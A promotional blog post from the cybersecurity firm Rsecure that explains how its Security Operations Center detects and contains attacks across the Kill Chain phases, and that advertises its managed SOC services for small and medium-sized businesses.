#Uncategorized

Behind the Scenes at an SOC : How Is an Attack Detected and Thwarted in Real Time ?

SOC Cybersécurité

Key Takeaways

  • The SOC evaluates security alerts. It correlates signals from endpoints, servers, security tools, and cloud environments to distinguish between false positives, legitimate activity, and threats that require intervention.
  • An attack is not limited to a single isolated event. A phishing email, an unusual login, the installation of a remote tool, or C2 communication may all be part of the same intrusion sequence. The SOC connects these steps to understand the progression of the attack.
  • SOC analysts combine detection rules, automation, and human analysis. Automation speeds up alert triage and the application of known scenarios. Human analysis remains necessary to interpret the customer’s context, assess the threat, and decide on the appropriate response.
  • The SOC can help contain an ongoing attack. Depending on the scenario and the procedures defined with the customer, analysts can recommend or initiate the isolation of a device, the blocking of a compromised account, the revocation of credentials, or the termination of suspicious communication.

Rsecure offers two levels of SOC monitoring depending on the scope of the environment to be protected. R-SOC Tranquility is designed for small and medium-sized businesses that want to secure their workstations and Microsoft 365 with EDR and standardized detection rules. R-SOC is intended for organizations that need to monitor a broader scope, including servers, networks, the cloud, and business applications.

For the fourth consecutive year, cyber risk has emerged as the top threat to European business leaders, according to the risk barometer published by the insurer Allianz in 2025. The fear of disruption caused by a cyberattack is once again the primary concern for organizations, ahead of natural disasters and climate change.

The challenge for companies isn’t just investing in cybersecurity solutions. They must also be able to process alerts, understand suspicious indicators, and take action before a cybercriminal gains access to internal data and compromises your information system.

This is precisely the role of the SOC (Security Operations Center), a team of cybersecurity experts that continuously monitors security events and analyzes alerts from your IT infrastructure.

Long associated with large organizations, SOCs are becoming more widely available to small and medium-sized businesses (SMEs) through managed services tailored to their budgets, environments, and operational constraints.

Why is a SOC essential to your cybersecurity? How does it work? What can it offer an SME that already has antivirus software or a firewall?

The experts at Rsecure, our cybersecurity subsidiary, answer these questions in this article.

What is a SOC, and how does it strengthen your company’s cybersecurity posture ?

Your company likely already has antivirus, firewall, or antispam software directly integrated into your collaborative work environment, such as Microsoft 365 or Google Workspace. If there’s any doubt about suspicious behavior, these IT security solutions generate alerts. But without a holistic view, it becomes difficult to determine whether these signals indicate an intrusion or are simply false positives.

As an extension of your IT team, the SOC provides this analytical capability. It correlates and aggregates telemetry data from all your IT equipment, analyzes these events, and then places them within the context of your business. As Laurent TABARD, SOC Manager at Rsecure, points out: “The SOC is more than just a monitoring console. It relies on an organizational structure, detection rules, and human analysis that enable us to detect complex modus operandi.”

In addition to the SOC’s detection capabilities, remediation efforts are also carried out. When a threat is confirmed, SOC analysts work to contain its spread within the client’s information system. In particular, they can block escape attempts, halt lateral movement to other workstations or servers, isolate a compromised workstation, or revoke credentials used during the attack.

How is a SOC team organized ?

Rsecure’s SOC is structured around three levels of expertise:

  • The Level 1 analyst performs an initial assessment of the collected telemetry data. Their primary responsibility is to determine whether an alert is a false positive, expected activity, or a signal that requires further investigation.
  • In case of suspicion, the Level 2 analyst, or N2, conducts a more in-depth analysis. They correlate the information, review the client’s context, and verify whether multiple signals point to a confirmed threat.
  • The Level 3 analyst, or N3, handles complex cases, remediates, and mitigates the threat. They conduct advanced investigations and contribute to the continuous improvement of the service, particularly by integrating new detection rules or third-party solutions, whether open-source or proprietary.

This organizational structure optimizes alert handling and allows analysts to focus their expertise on events that warrant it.

Let’s discuss your SOC needs !

How does the SOC detect cyberattacks against your companies ?

A cyberattack rarely consists of a single action. It follows a series of steps, ranging from a reconnaissance phase to intrusion into the target’s information system. Known as the “Kill Chain,” this model enables SOC analysts to anticipate a cybercriminal’s next moves once a threat has been confirmed.

At first glance, a phishing email received by an employee may seem like just an isolated incident. However, if it is followed by an unusual connection from an unknown device, then an attempt to install a remote administration tool, the scenario changes. By drawing on reference frameworks and typical attack models, of which the Kill Chain is an example, the SOC analyst connects these events to determine whether they are part of the same attack sequence.

At Rsecure, our SOC analysts have the expertise needed to connect these signals. They can intervene at various stages of a cyberattack to limit its progression, whether it aims to steal data, encrypt files, compromise accounts, or disrupt business operations.

Phase 1 – Reconnaissance : The First Signs Before the Attack

An attack often begins with a reconnaissance phase known as “recon.” The cyberattacker seeks to understand the environment of the targeted company. They may scan exposed applications, identify services accessible from the Internet, or collect publicly available information about the organization and its employees.

What the SOC can do: When deploying the SOC for our clients, Rsecure’s experts provide configuration recommendations, particularly regarding services accessible from the Internet. This advice is designed to reduce the company’s exposed attack surface.

This initial work then makes it easier for analysts to detect weak signals. Repeated scans of these exposed services, or indicators derived from CTI (Cyber Threat Intelligence), will be more effectively identified and assessed and, where appropriate, will be subject to enhanced monitoring.

Phase 2 – Delivery : The attack hits the target

The delivery phase is when the attack is delivered to the company. In a common scenario, an employee receives a phishing message. It may contain a link, an attachment, or a redirect to a fraudulent page.

What the SOC can do: Teams analyze suspicious links, the domain associated with the sender, and the message’s content. Phishing is not treated as an isolated event, but as the starting point of a potential sequence of actions to monitor.

Phase 3 – Exploitation : The cyberattacker attempts to gain initial access.

The exploitation phase begins when the cyberattacker attempts to capitalize on the target’s action. The employee may click on a link, enter their credentials, open a file, or download something. The attacker may also make multiple login attempts, test common passwords, or use credentials obtained from data breaches.

What the SOC can do: The team analyzes the actions that follow this initial contact to understand the impact on the client’s IT environment. As our SOC Manager at Rsecure explains: “It’s based on the actions taken afterward that you’ll detect that there may be a problem.”

The value of the SOC therefore lies in its ability to interpret a chain of events as a whole, rather than as isolated actions.

Phase 4 – Installation : The cyberattacker establishes persistent access.

After the exploitation phase, the attacker may seek to establish persistent access to the compromised machine. This may involve malware (a payload) or the use of a legitimate program already present on the victim’s machine.

This technique is known as “Living off the Land.” As Rsecure’s SOC Manager explains: “These are legitimate tools that are hijacked for malicious purposes.”

“LOLBins” (Living Off the Land Binaries), in particular, are legitimate system executables (PowerShell, WMIC, certutil.exe) that are frequently hijacked by attackers.

What the SOC can do: verify whether the program being used is legitimate within the client’s environment, whether the actions being performed align with its typical usage, and whether network communications reveal any suspicious external traffic.

Phase 5 – Remote Control : The cyberattacker takes control.

Once persistent access has been established, the cybercriminal seeks to communicate with the compromised workstation or server through a command-and-control (C2) channel. This channel allows the cybercriminal to send instructions to the compromised device, perform actions remotely, and prepare the next steps in the attack—often lateral movement within the information system.

What the SOC can do: Teams continuously analyze data transiting through the company’s network. Analysts look for any unusual communication, suspicious domain names, or abnormal data traffic volumes. Detection rules predefined by SOC teams partially automate this work and trigger security alerts.

If the malicious nature of the activity is confirmed, a remediation measure can be initiated, such as stopping the suspicious process using an EDR solution that would have been installed beforehand on workstations and other devices in the IT infrastructure.

Phase 6 – The Ultimate Goal : Data Exfiltration

After gaining persistent access, the attacker most often seeks to exfiltrate data and move laterally across the company’s internal network in order to infect new machines.

What the SOC can do: SOC analysts now have several tools at their disposal, which they can correlate to determine whether an attack is indeed underway, assess the potential impact, and identify the affected devices and user accounts.

Once the threat has been assessed, the client is alerted, and remediation actions are initiated with the client’s consent. These actions may include blocking the account or isolating compromised devices.

The SOC then fully fulfills its role as an advisor and support provider. The analysts’ expertise and their knowledge of the client’s environment enable them to act quickly and propose appropriate measures.

Thus, while automated detection and artificial intelligence can facilitate the detection of cyberattacks, the SOC’s actions remain guided by human analysis. “The final decision is always made by a human,” explains Laurent Tabard.

Make an appointment now !

Managed SOC : An Accessible Service for SMEs

A SOC offers several advantages for companies looking to strengthen their cybersecurity without having to build a dedicated in-house team.

Our R-SOC Tranquility offering was designed with this in mind. Tailored for small and medium-sized businesses, it is based on a transparent pricing model determined by the scope to be monitored and the components to be secured within your infrastructure. “At Rsecure, the model is based on a user, a machine, or a server. This makes it easier to forecast your budget,” explains Laurent Tabard, SOC Manager at Rsecure.

Our SOC analysts can provide continuous monitoring from our offices in Luxembourg, 24 hours a day, 7 days a week.

With the R-SOC offering, companies with broader monitoring needs—or those subject to stricter regulatory requirements—can expand their coverage, customize the scope of monitoring, and tailor the monitoring to more specific work environments or infrastructures.

Detect cyber threats with Rsecure’s SOC

To ensure that IT security doesn’t become an additional burden for your business, Rsecure steps in to support your teams and strengthen your cybersecurity posture.

Our experts are on standby to assist you in the event of a suspected or confirmed attack, as well as during incident response, by supporting your teams.

Contact the Rsecure team today to assess the level of monitoring best suited to your business.

How can we help you?

Fill in this form and we will get back to you as soon as possible.

"*" indicates required fields

This field is for validation purposes and should be left unchanged.